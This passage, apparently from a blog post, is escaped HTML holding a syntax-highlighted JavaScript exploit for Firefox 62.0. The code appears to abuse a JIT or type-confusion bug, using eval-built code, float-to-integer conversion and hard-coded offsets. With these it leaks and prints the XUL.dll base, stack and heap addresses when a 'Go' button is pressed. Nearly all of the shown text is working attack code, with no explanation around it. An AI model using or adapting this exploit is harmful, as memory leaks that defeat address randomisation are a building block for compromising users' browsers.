class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sz<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">prototype<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">push<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">call<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1337<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">43<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sz<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">expr<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">eval<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">code<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-42\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-43\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-44\"><span 
class=\"crayon-e\">VERSION<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;62.0&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-45\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-46\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">exploit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xul<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">stack<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">heap<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5bbd2958b124c514799649-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">gen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10000<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">j<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">f<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">f<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">100<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-58\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">f2i<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">test<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-60\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">push<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-63\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">xulbase<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">VERSION<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;62.0&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">offsets<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x92fe34<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x3bd4108<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-71\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Unknown version: &#8216;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VERSION<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">throw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">offsets<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">forEach<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-82\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">xul<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">xulbase<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">stack<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">heap<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span 
class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-86\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;pre&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">innerText<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;XUL.dll base: &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xul<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;n&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-90\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;Stack: &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">stack<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;n&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;Heap: &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">heap<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;n&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;nFull leak:n&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">map<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">hex<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">join<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;n&#8221;<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-94\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-95\"><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-96\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-97\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">button <\/span><span class=\"crayon-e\">onclick<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;exploit()&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Go<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">button<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0201 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; 